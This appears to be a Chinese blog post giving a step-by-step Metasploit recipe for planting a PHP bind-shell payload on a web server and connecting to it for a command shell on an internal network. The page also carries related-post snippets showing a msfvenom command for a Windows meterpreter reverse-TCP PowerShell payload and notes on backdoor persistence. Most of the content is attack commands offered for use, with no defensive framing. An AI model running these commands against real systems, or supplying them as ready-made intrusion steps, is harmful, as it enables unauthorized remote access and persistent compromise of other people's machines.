php結合msf反彈內網shell

2022-03-28 18:37:34 字數 730 閱讀 1576

感謝:

perl6大佬分享的姿勢。

msf:

msf > use payload/php/bind_php

msf exploit(handler) > set payload payload/php/bind_php

msf exploit(handler) > set rhost 目標內網ip

msf payload(bind_php) > generate -f f:/xishaonian.php -t raw //之後就會在f盤生成xishaonian.php指令碼一般都是需要修改一下,沒有php標籤就加個php標籤之類的。

然後將xishaonian.php傳到web上。

然後再次執行msf

use payload/php/bind_php

msf payload(bind_php) > set rhost 目標外網ip

msf payload(bind_php) > use exploit/multi/handler

msf exploit(handler) > set payload php/bind_php

msf exploit(handler) > run

訪問web上的xishaonian.php,就可以**到cmdshell了。

msf反彈shell內網滲透

1.msfvenom p windows x64 meterpreter reverse tcp lhost 本機ip位址 lport 本機監聽埠 f psh reflection o xx.ps1 生成檔案放在目標機目錄下 powershell執行指令碼 powershell windowstyl...

win 內網frp反彈到內網liunx

這是我的兩個版本 我這個就是驗證frp可以在不同系統之間使用 準備工作 靶機 win2003 ip 192.168。1.132 公網 vps windows x.x.x.x kali 192.168。1.104 這裡 為了模擬 win和kali不是乙個網段 所以不直接 shell 假裝兩台pc不能p...

內網滲透 許可權維持 MSF

msf路徑 usr share 製作後門 msfvenom windows示例 遠控流程 2.開啟msf並進入handle模組 3.設定payload型別 必須與第一步一致 4.設定lhost和lport 與第一步生成的後門一致 5.options檢視配置是否正確 6.run執行 bg將程序放到後台...